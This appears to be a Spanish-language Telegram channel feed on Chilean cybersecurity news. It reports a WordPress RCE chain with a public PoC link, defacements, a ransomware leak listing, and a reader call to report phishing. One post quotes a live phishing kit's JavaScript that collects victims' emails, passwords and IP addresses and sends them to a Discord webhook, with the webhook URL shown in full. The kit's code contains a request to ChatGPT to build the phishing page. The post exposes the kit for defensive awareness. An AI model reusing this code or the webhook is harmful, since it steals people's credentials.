🇨🇱 Chileaks
(Esto paso ayer 17-07-2026) La Comisión de Futuro aprobó en general el proyecto que regula el acceso de menores de edad a plataformas digitales. La propuesta busca proteger el bienestar físico, psicológico y social de niños, niñas y adolescentes. Para ello…
Hay aproximadamente 1109 sitios web Chilenos que aún usan WordPress sin parchar.
Recordemos que WordPress sacó parche ayer para el CVE-2026-63030
Versiones afectadas
Versiones 6.8.x solo afectadas por la SQLi sola (parche en 6.8.6). Versiones anteriores: no afectadas por esta cadena.
PoC: https://github.com/Icex0/wp2shell-poc
Recordemos que WordPress sacó parche ayer para el CVE-2026-63030
CVE-2026-63030 es una vulnerabilidad crítica en WordPress Core (parte de la cadena conocida como wp2shell). Se trata de un Remote Code Execution (RCE) pre-autenticación que combina:CVE-2026-63030: Confusión de rutas (route confusion) en el endpoint REST API batch (/wp-json/batch/v1).
CVE-2026-60137: SQL Injection en WP_Query (específicamente en el parámetro author__not_in).
No requiere login, plugins ni configuración especial. Afecta instalaciones por defecto.
Versiones afectadas
WordPress 6.9.0 a 6.9.4 → Vulnerable al RCE completo (parcheado en 6.9.5).
WordPress 7.0.0 a 7.0.1 → Vulnerable al RCE completo (parcheado en 7.0.2).
Versiones 6.8.x solo afectadas por la SQLi sola (parche en 6.8.6). Versiones anteriores: no afectadas por esta cadena.
PoC: https://github.com/Icex0/wp2shell-poc
GitHub
GitHub - Icex0/wp2shell-poc: wp2shell (CVE-2026-63030 & CVE-2026-60137) - full RCE chain
wp2shell (CVE-2026-63030 & CVE-2026-60137) - full RCE chain - Icex0/wp2shell-poc
❤4🗿1
🇨🇱 Chileaks
🇨🇱 0xPayload se atribuye deface a ohigginsfc.cl
Además atacaron la web de la Municipalidad de Coquimbo ( municoquimbo.cl)
😱4🤔1
El grupo de ransomware Qilin ha publicado en su blog a RECSA (recsalatam.com)
RECSA ofrece servicios de contact center a clientes en 16 mercados de América Latina incluido Chile.
RECSA ofrece servicios de contact center a clientes en 16 mercados de América Latina incluido Chile.
👍5
En los últimos días he recibido varios avisos sobre campañas de phishing por mensaje directo. Muchas gracias a quienes se han tomado el tiempo de reportarlo.
Aprovecho de recordarles: si les llega algún SMS, correo o mensaje de WhatsApp que sea un fraude evidente, envíenmelo por mensaje privado. Los estaré analizando para publicar alertas y prevenir a la comunidad.
Aprovecho de recordarles: si les llega algún SMS, correo o mensaje de WhatsApp que sea un fraude evidente, envíenmelo por mensaje privado. Los estaré analizando para publicar alertas y prevenir a la comunidad.
👍6🔥1
https://verificacion-avisofinalll.fwh.is
Oye si, chatgpt , hazme una pagina todo guapa para hacer fishin, no cometas errores.
var ip, ip2;
$.getJSON("https://api.ipify.org?format=json", function(data) {
ip = data.ip;
$.getJSON("https://ipinfo.io", function (response) {
ip2 = response.city + ", " + response.country;
// Crear el mensaje para Discord
var discordMessage = {
"content": "@everyone", // Mención a todos
"embeds": [
{
"title": "🔐 Nuevo Inicio de Sesión",
"color": 3447003,
"fields": [
{
"name": "📧 Correo Electrónico",
"value": u_name777,
"inline": false
},
{
"name": "🔒 Contraseña",
"value": u_name888,
"inline": false
},
{
"name": "🌍 IP y Ubicación",
"value": "IP: " + ip + "\nUbicación: " + ip2,
"inline": false
}
],
"timestamp": new Date().toISOString(),
"footer": {
"text": "Microsoft Login"
}
}
]
};👻7❤3😁2
🇨🇱 Chileaks
https://verificacion-avisofinalll.fwh.is Oye si, chatgpt , hazme una pagina todo guapa para hacer fishin, no cometas errores. var ip, ip2; $.getJSON("https://api.ipify.org?format=json", function(data) { ip = data.ip; $.getJSO…
https://verificacion-avisofinalll.fwh.is/telgm.js
// Configuración para
var discord_webhook_url = "https://discordapp.com/api/webhooks/1524923990764814357/mZuWi-ysAYVet-HdH9_QszD0bx97K5wjYbFmfsVcrcTtMNHKlZW6mGnXDhIm7Lpv9UNb";
😁8